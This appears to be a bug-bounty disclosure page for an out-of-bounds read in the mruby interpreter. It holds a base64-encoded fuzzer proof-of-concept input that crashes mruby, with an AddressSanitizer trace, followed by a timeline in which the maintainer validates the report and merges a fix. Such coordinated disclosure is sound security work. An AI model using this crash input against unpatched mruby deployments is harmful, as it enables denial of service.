Out-of-bounds Read in mruby/mruby

Valid

Reported on Feb 8th 2022

Description

commit 4e8ab145da52c3cfb0bd4b823df8041dcc52f454

Author: Yukihiro "Matz" Matsumoto matz@ruby.or.jp

Date: Tue Feb 8 13:03:51 2022 +0900

Proof of Concept

$ echo -ne "e30KWyoqMCxtOjBdBHM9MDYudGl0ZXN7My7+////c3slXSN7W11lYWsKYj17fQpbKiowLG06MF3/
f///jn11EHRpbC1icmWeawpiPXt99FsqKkBidWYwXX9zPTB9XX1hLiF+IBD///wAAPoAoqKion19
AACA/wENXH9dXGM/ICphID0gKCkgYW1iZCVcX0JO//4AACA8ACpbAAB7KQ==" | base64 -d > poc
$ cat poc
{}
[**0,m:0]s=06.tites{3.����s{%]#{[]eak
b={}
[**0,m:0]����}util-bre�k
\]\c? *a = () ambd%\_BN�� <*[{)#
$ ./bin/mruby ./poc
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1898947==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x00000059dca6 bp 0x7ffd8e5ac2b0 sp 0x7ffd8e5ab390 T0)
==1898947==The signal is caused by a READ memory access.
==1898947==Hint: address points to the zero page.
    #0 0x59dca6 in mrb_check_frozen /root/fuzz/mruby/include/mruby.h:1418:7
    #1 0x59dca6 in hash_modify /root/fuzz/mruby/src/hash.c:1154:3
    #2 0x59dca6 in mrb_hash_set /root/fuzz/mruby/src/hash.c:1242:3
    #3 0x4e5273 in mrb_vm_exec /root/fuzz/mruby/src/vm.c:2771:9
    #4 0x4d77de in mrb_vm_run /root/fuzz/mruby/src/vm.c:1128:12
    #5 0x5e83a2 in mrb_load_exec /root/fuzz/mruby/mrbgems/mruby-compiler/core/parse.y:6883:7
    #6 0x5e9293 in mrb_load_detect_file_cxt /root/fuzz/mruby/mrbgems/mruby-compiler/core/parse.y:6926:12
    #7 0x4cb88b in main /root/fuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #8 0x7fb293420564 in __libc_start_main csu/../csu/libc-start.c:332:16
    #9 0x41d7ad in _start (/root/fuzz/mruby/bin/mruby+0x41d7ad)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/fuzz/mruby/include/mruby.h:1418:7 in mrb_check_frozen
==1898947==ABORTING

Impact

Typically, an out-of-bounds read of this kind can allow attackers to read sensitive information from other memory locations or, as the AddressSanitizer trace above shows (a SEGV on a near-null read in mrb_check_frozen), crash the interpreter.

Acknowledgement

Thanks to alkyne Choi

We are processing your report and will contact the mruby team within 24 hours. 4 months ago
Pocas modified the report 4 months ago
We have contacted a member of the mruby team and are waiting to hear back 4 months ago
Pocas (Researcher), 4 months ago:

hey

We have sent a follow up to the mruby team. We will try again in 7 days. 4 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 3 months ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on ff3a5e 3 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
Yukihiro (Maintainer), 3 months ago:

Sorry for being late to check.